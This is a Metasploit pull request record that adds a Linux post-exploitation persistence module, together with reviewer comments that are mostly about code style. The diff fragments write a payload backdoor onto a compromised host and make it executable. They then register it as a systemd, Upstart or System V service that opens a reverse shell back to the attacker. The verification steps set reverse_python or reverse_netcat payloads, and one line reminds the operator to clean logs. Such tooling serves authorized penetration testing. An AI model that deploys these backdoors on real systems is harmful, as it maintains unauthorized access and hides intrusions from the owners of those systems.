### PR TITLE
linux service persistence

### PR DESCRIPTION
**Pull request by h00die**
This module adds persistence through a Linux service which will call back to us.
Utilizes Upstart, System V, or systemd depending on the system.  Please see the documentation as it was tested on several OS flavors, and I tried to document everything with examples.

Verification Steps:
- [ ] 1. Start msfconsole
- [ ] 2. Exploit a box via whatever method
- [ ] 3. Do: `use exploit/linux/local/service_persistence`
- [ ] 4. Do: `set session #`
- [ ] 5. Do: `set verbose true`
- [ ] 6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
- [ ] 7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
- [ ] 8. Do: `set lhost`
- [ ] 9. Do: `exploit`
- [ ] 10. Do: `use exploit/multi/handler`
- [ ] 11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
- [ ] 12. Do: `set lhost`
- [ ] 13. Do: `exploit -j`
- [ ] 14. Kill your shell (if System V, reboot target).  Upstart/systemd wait 10sec
- [ ] 15. Get Shell

### CODE REVIEW

**Comment by h00die** [comment]
I believe travis failing is a false positive since that standard out printing is with a variable that gets written to the filesystem on target.  But someone smarter than me should double check since ive been wrong before

File: modules/exploits/linux/local/service_persistence.rb [hunk 1]
```diff
@@ -0,0 +1,286 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Don't think you need these two ```require``` statements.

Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Don't think you need these ```require``` statements.

File: modules/exploits/linux/local/service_persistence.rb [hunk 2]
```diff
@@ -0,0 +1,286 @@
...
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die <mike@shorebreaksecurity.com>'
+          ],
+        'Platform'       => ['unix', 'linux'],
+        'Targets'        =>
+          [
+            ['Auto',     {}],
+            ['System V', { 'runlevel' => '2 3 4 5' }],
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: You can make these keys symbols.

File: modules/exploits/linux/local/service_persistence.rb [hunk 3]
```diff
@@ -0,0 +1,286 @@
...
+    backdoor = "#{path}/#{file_name}"
+    vprint_status("Writing backdoor to #{backdoor}")
+    write_file(backdoor, payload.encoded)
+    cmd_exec("chmod 711 #{backdoor}")
+    backdoor
+  end
+
+  def systemd(backdoor_path, backdoor_file)
+    # https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
+    script = "[Unit]\n"
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Here document.

File: modules/exploits/linux/local/service_persistence.rb [hunk 4]
```diff
@@ -0,0 +1,286 @@
...
+    write_file("/lib/systemd/system/#{service_filename}.service", script)
+    vprint_status('Enabling service')
+    cmd_exec("systemctl enable #{service_filename}.service")
+    vprint_status('Starting service')
+    cmd_exec("systemctl start #{service_filename}.service")
+  end
+
+  def upstart(backdoor_path, backdoor_file, runlevel)
+    # http://blog.terminal.com/getting-started-with-upstart/
+    script = "description \"Start daemon at boot time\"\n"
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Here document.

File: modules/exploits/linux/local/service_persistence.rb [hunk 5]
```diff
@@ -0,0 +1,286 @@
...
+    vprint_status("Dont forget to clean logs: /var/log/upstart/#{service_filename}.log")
+  end
+
+  def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
+    if has_updatercd
+      print_status('Utilizing update-rc.d')
+    else
+      print_status('Utilizing chkconfig')
+    end
+    script = "#!/bin/sh\n"
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Here document.

File: modules/exploits/linux/local/service_persistence.rb [hunk 6]
```diff
@@ -0,0 +1,286 @@
...
+          {
+            'PayloadType'  => 'cmd',
+            'RequiredCmd'  => 'python netcat' # we need non-threaded/forked so the systems properly detect the service going down
+          }
+        },
+        'DefaultOptions' =>
+          {
+            'WfsDelay' => 5
+          },
+        'DisclosureDate' => 'Jan 1 1983', # system v release date
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: lol

File: modules/exploits/linux/local/service_persistence.rb [hunk 7]
```diff
@@ -0,0 +1,286 @@
...
+        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
+        OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
+        OptString.new('SERVICE', [false, 'Name of service to create'])
+      ], self.class
+    )
+  end
+
+  def exploit
+    backdoor = write_shell(datastore['SHELLPATH'])
+    path = backdoor.split(File::SEPARATOR)[0...-1].join('/')
```
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Isn't ```File::SEPARATOR``` local?

File: modules/exploits/linux/local/service_persistence.rb (hunk 3 above)
Comment (wvu-r7) [inline modules/exploits/linux/local/service_persistence.rb]: Or use a ```%```-string.

File: modules/exploits/linux/local/service_persistence.rb (hunk 7 above)
Comment (h00die) [inline modules/exploits/linux/local/service_persistence.rb]: ugh. Sometimes i forget there are msf Windows users in the world....

**Comment by tdoan-r7** [comment]
@wvu-r7 can you add release notes please?

**Comment by wvu-r7** [comment]
# Release Notes

This adds a post-exploitation module that maintains persistence through the use of Linux system services.

**Pull request merged**